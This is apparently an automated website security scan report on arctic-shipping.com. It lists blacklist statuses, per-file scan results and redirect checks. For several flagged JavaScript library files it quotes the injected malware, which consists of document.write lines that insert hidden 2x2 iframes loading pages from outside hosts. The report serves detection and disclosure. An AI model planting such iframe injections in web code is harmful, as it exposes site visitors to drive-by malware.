Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=arctic-shipping.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://arctic-shipping.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://arctic-shipping.com/ | 200 OK Content-Length: 13542 Content-Type: text/html | clean |
http://arctic-shipping.com/publish_skins/CHNL/javascript.js | 200 OK Content-Length: 1773 Content-Type: application/javascript | clean |
http://arctic-shipping.com/jquery-1.3.2.min.js | 200 OK Content-Length: 57741 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.h
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185>
Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185>
Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/haod.html?j=1476365 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.html?j=1476365>
http://arctic-shipping.com/js/jquery.galleryview-1.1.js | 200 OK Content-Length: 18825 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.h
transition_speed: 400, transition_interval: 6000, overlay_opacity: 0.6, overlay_color: 'black', background_color: 'black', overlay_text_color: 'white', caption_text_color: 'white', border: '1px solid black', nav_theme: 'light', easing: 'swing', filmstrip_position: 'bottom', overlay_position: 'bottom', show_captions: false, fade_panels: true, pause_on_hover: false }; })(jQuery);
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185>
Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/haod.html?j=1476365 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.html?j=1476365>
Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185>
http://arctic-shipping.com/js/jquery.timers-1.1.2.js | 200 OK Content-Length: 3876 Content-Type: application/javascript | suspicious |
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185>
Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185>
Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/haod.html?j=1476365 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.html?j=1476365>
http://arctic-shipping.com/js/jquery.easing.1.3.js | 200 OK Content-Length: 8584 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.h
return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b; } else if (t < (2.5/2.75)) { return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b; } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } });
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185>
Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185>
Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/haod.html?j=1476365 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.html?j=1476365>
http://arctic-shipping.com/js/swfobject.js | 200 OK Content-Length: 7407 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.h
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185>
Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/haod.html?j=1476365 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.html?j=1476365>
Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185>
http://arctic-shipping.com/js/AC_RunActiveContent.js | 200 OK Content-Length: 3719 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.h
case "hspace": case "class": case "title": case "accesskey": case "name": case "id": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; }
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185>
Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/haod.html?j=1476365 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.html?j=1476365>
Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185>
http://arctic-shipping.com/thickbox.js | 200 OK Content-Length: 12351 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.h
var h = window.innerHeight || self.innerHeight || (de&&de.clientHeight) || document.body.clientHeight; arrayPageSize = [w,h]; return arrayPageSize; } function tb_detectMacXFF() { var userAgent = navigator.userAgent.toLowerCase(); if (userAgent.indexOf('mac') != -1 && userAgent.indexOf('firefox')!=-1) { return true; } }
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185>
Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/haod.html?j=1476365 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.html?j=1476365>
Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185>
http://arctic-shipping.com/js/jquery.jcarusel.js | 200 OK Content-Length: 2870 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.h
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185>
Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185>
Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/haod.html?j=1476365 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.html?j=1476365>
http://arctic-shipping.com/js/nivoslider/jquery.nivo.slider.pack.js | 200 OK Content-Length: 6550 Content-Type: application/javascript | clean |
http://millerusa.net/806507.js | 521 Origin Down Content-Length: 5914 Content-Type: text/html | clean |
http://millerusa.net//cdnjs.cloudflare.com/ajax/libs/zepto/1.0/zepto.min.js/ | 521 Origin Down Content-Length: 6575 Content-Type: text/html | clean |
http://millerusa.net/cdn-cgi/scripts/cf.common.js | 200 OK Content-Length: 4930 Content-Type: application/javascript | clean |
http://millerusa.net/test404page.js | 521 Origin Down Content-Length: 5914 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: arctic-shipping.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 03 Jun 2014 23:03:50 GMT
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=24149fc685ea44a84f0f251d013b4894; path=/
X-Powered-By: PHP/5.2.6-1+lenny13
Second query (visit from search engine):
GET / HTTP/1.1
Host: arctic-shipping.com
Referer: http://www.google.com/search?q=arctic-shipping.com
Result:
The result is similar to the first query. There are no suspicious redirects found.